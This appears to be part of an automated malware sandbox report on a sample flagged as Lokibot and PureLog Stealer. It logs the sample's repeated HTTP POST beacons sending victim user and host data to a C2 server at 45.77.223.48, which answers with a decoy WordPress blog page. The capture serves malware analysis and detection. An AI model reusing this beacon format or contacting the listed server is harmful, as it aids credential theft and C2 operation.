                                            Apr 26, 2024 04:43:47.160090923 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:47.160171986 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:47.160248041 CEST761INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:47.337677002 CEST1289INData Raw: 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e
                                            Data Ascii: lock-social-links .wp-block-social-link.wp-social-link{display:inline-block;margin:0;padding:0}.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link.wp-social-link


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            67192.168.2.44981045.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:47.482326984 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:47.670917034 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:48.644124031 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:47 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:48.644233942 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:48.644273043 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:48.687594891 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:48.687644958 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:48.687685966 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:48.687721014 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:48.687916994 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:48.687972069 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:48.688009977 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            68192.168.2.44981145.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:48.980951071 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:49.171013117 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:50.099724054 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:49 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:50.100467920 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:50.109718084 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:50.110168934 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:50.110205889 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:50.110377073 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:50.111219883 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:50.111262083 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:50.111299992 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:50.111448050 CEST1289INData Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 0a
                                            Data Ascii: <style id='wp-block-site-title-inline-css'>.wp-block-site-title a{color:inherit}</style><style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            69192.168.2.44981245.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:50.432496071 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:50.620397091 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:51.496342897 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:51.496465921 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:51.505086899 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:51.505549908 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:51.505618095 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:51.505705118 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:51.505934000 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:51.506087065 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:51.506170988 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:51.706311941 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:50 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            70192.168.2.44981345.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:52.043340921 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:52.231024027 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:53.183917046 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:52 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:53.183980942 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:53.184017897 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:53.192580938 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:53.192883968 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:53.192994118 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:53.193069935 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:53.193280935 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:53.193393946 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:53.193432093 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:04:41:58
                                            Start date:26/04/2024
                                            Path:C:\Users\user\Desktop\SCB#89940578.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\SCB#89940578.exe"
                                            Imagebase:0x610000
                                            File size:706'056 bytes
                                            MD5 hash:8BDFE306F813BA1A65ECF6E1DA4085C1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1706474563.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
